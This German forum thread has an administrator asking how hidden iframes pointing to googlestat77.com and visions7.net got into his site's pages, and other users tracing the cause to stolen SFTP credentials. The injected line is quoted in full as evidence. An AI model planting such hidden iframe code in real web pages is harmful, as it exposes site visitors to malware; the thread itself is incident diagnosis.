nicht angemeldet
visions7.net iframe
0 0 
Der Martin
0 0 Der Martin
0 0
0
visions7.net iframe
hallo
Auf einem meiner Server wurde in index.htm, start.php und home.php folgende Zeile eingefuegt:
<iframe src='http://googlestat77.com/' width=1 height=1 style='visibility:hidden;'></iframe><iframe src='http://visions7.net/' width=1 height=1 style='visibility:hidden;'></iframe>
Es ist installiert:
Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny3 with Suhosin-Patch mod_ssl/2.2.9 OpenSSL/0.9.8g
Nach dem Hack waren bei den modifizierten Files folgender owner: mein_login und folgende group: www-data
Hab ausschliesslich einen sftp Zugang ueber einen unueblichen Port, und es rennt eine einzige Seite drauf mit eigenen php Scripts.
Der Seitenbetreiber hat vor kurzem ein paar harmlose externe Javascripts ueber sein cms eingebaut ("addthis" usw).
Hat jemand eine Ahnung wie ich herausfinden kann welche Schwachstelle dabei ausgenutzt wurde ?
Vielen dank
hans
-
ps: In den apache2/access.logs erscheinen die modifizierten Files nicht, zumindest nicht jene die per html nicht in Betrieb waren.
-
Moin,
ps: In den apache2/access.logs erscheinen die modifizierten Files nicht, zumindest nicht jene die per html nicht in Betrieb waren.
ich verstehe kein Wort - kannst du das bitte nochmal klarer formulieren?
Ciao,
Martin--
... und der FDP-Wähler gibt seine Stimme der FDP.
(Faszinierende Erkenntnis meines Gemeinschaftskunde-Lehrers, 9. Schuljahr)
Selfcode: fo:) ch:{ rl:| br:< n4:( ie:| mo:| va:) de:] zu:) fl:{ ss:) ls:µ js:(-
ich verstehe kein Wort - kannst du das bitte nochmal klarer formulieren?
naja, irgendwo muss ich ja anfangen die schwachstelle zu suchen, also hab ich die apache-accesslogs runtergeladen. von den 3 modifizierten files war ein "totes" file dabei, welches auf der homepage nicht verlinkt war. zu diesem gibts keine treffer in den logs, zu den anderen 2 nur aufrufe durch webbrowser.
is aber ein irrelevanter nebenaspekt. meine frage bezieht sich darauf WIE diese 3 files modifiziert werden konnten obwohl der server gut abgesichert ist. laut google sind diese iframe-einschuebe das erste mal am 28.11. aufgetaucht, und in keinem thread konnte wer das schlupfloch ausfindig machen, drum hab ichs hier gepostet.
gruesse
ps: mit "login_name" hab ich den sftp-usernamen gemeint.
-
Hallo,
naja, irgendwo muss ich ja anfangen die schwachstelle zu suchen, also hab ich die apache-accesslogs runtergeladen.
guter Gedanke, führt aber nicht zur Lösung.
von den 3 modifizierten files war ein "totes" file dabei, welches auf der homepage nicht verlinkt war. zu diesem gibts keine treffer in den logs, zu den anderen 2 nur aufrufe durch webbrowser.
Oder durch andere HTTP-Clients, die sich als Browser ausgeben. Vielleicht irgendwelche Suchmaschinen-Bots.
Aber das bringt dich nicht weiter, denn im Apache-Log kommen auch nur Informationen über normale HTTP-Aufrufe vor. Von anderen Zugriffen "weiß" der Apache ja nichts.is aber ein irrelevanter nebenaspekt. meine frage bezieht sich darauf WIE diese 3 files modifiziert werden konnten obwohl der server gut abgesichert ist. laut google sind diese iframe-einschuebe das erste mal am 28.11. aufgetaucht, und in keinem thread konnte wer das schlupfloch ausfindig machen, drum hab ichs hier gepostet.
Es muss also ein Weg sein, der es einem Angreifer ermöglicht, unter *deinem* Account an die Daten zu kommen. Manipulation durch ein PHP-Script fällt also aus - oder läuft PHP bzw. der Webserver ebenfalls unter deinem Benutzernamen?
Ich würde mir an deiner Stelle um [d|m]einen SFTP-Zugang Sorgen machen. Könnte es sein, dass jemand unbefugt an die Zugangsdaten gekommen ist? Was sagt das Log des (S)FTP-Servers? Erkennst du dort Zugriffe, die nicht von dir selbst stammen?So long,
Martin--
Die beste Informationsquelle sind Leute, die jemand anderem versprochen haben, nichts weiterzuerzählen.
(alte Journalistenweisheit)
Selfcode: fo:) ch:{ rl:| br:< n4:( ie:| mo:| va:) de:] zu:) fl:{ ss:) ls:µ js:( -
Ja bitte um ANTOWRTEN, bin auch betroffen, habe mir ertsmal ein Script geschrieben, welches alle dieser Iframes Entfernt, weil ich auch nicht weis wo die Schwachstelle liegt! Bei mir sind es nur leider 100 Seiten!
Nun zum Zweiten mal, am PC selbst kanns nicht liegen, ich dachte zunächst der ANgriff kann nicht übers Netzt kommen also über den Server, weil gut abgesichert, ich dachte ich habe ein Virus der hier lokal die FTP-Connection mit Snifft und dann in ruhe alle Files Scannen und bearbeiten kann!? Aber nun habe ich einen anderen Rechner und heute morgen war es wieder soweit, wobei es auch mein Netbook gestern Abend gewesen sein könnte. Ich glaube nicht an SQL-Injection, bei sovielen unterschiedlichen Seiten (...)Conny
-
Ja bitte um ANTOWRTEN, bin auch betroffen,
So wies ausschaut hatte einer der Leute die sftp Zugang haben diesen Trojaner auf seinem PC. Er war nur mit Mcafee geschuetzt. Er ist jetzt kurzfristig auf Linux umgestiegen. Seltsamerweise fand laut Logs der Upload von einem PC in D statt, waerend der infizierte PC in Oesterreich steht. Schaut nach einem Botnet aus.
(Theroretisch koennte er seinen PC auch infiziert haben nachdem er die infizierte Homepage geladen hat, find ich aber unwarscheinlich.)
Wie DerMartin schon gesagt hat, Manipulation durch ein PHP-Script fällt aus weil der Upload nicht durch www-data erfolgte unter dem die php Engine laeufft.
Sftp Passwort hab ich gestern schon geaendert und der Spuk tauchte inzwischen nicht mehr auf.
gruesse hans
-
PS:
Seltsamerweise fand laut Logs der Upload von einem PC in D statt
Gefunden in den Ftp-Logs meinte ich.
-
-
-
Welches Betriebssystem hast du drauf?
Welche Java-Version?
Welchen FTP-Client?
Welchen Hoster?Vll kommen wir mit solchen Fragen weiter??
Ich habe jetzt erstmal mein PW Geändert, aber das wird nix bringen, war vorher schon sicherer als "1234" :)Conny
-
-
-
-
Seid gegrüßt!
ich vermute folgendes:Du hast nen Trojaner (o.ä.) auf dem Rechner, welcher die Zugangsdaten des (S)FTP-Zugangs an jemanden anderes weiter gegeben hat. Die Veränderungen der Dateien sind sicher via FTP erfolgt, das ja sonst Owner und Gruppe auf www-data gesetzt wären, oder?
Gibt es FTP-Logs? Sicher kannst du hier mittels Zeitstempel der veränderten Dateien und einem Vergleich mit den FTP-Logs genaueres erfahren.
--
Bis Später
RuD
.................................................................
Mein Weblog:
http://blog.rudweb.de/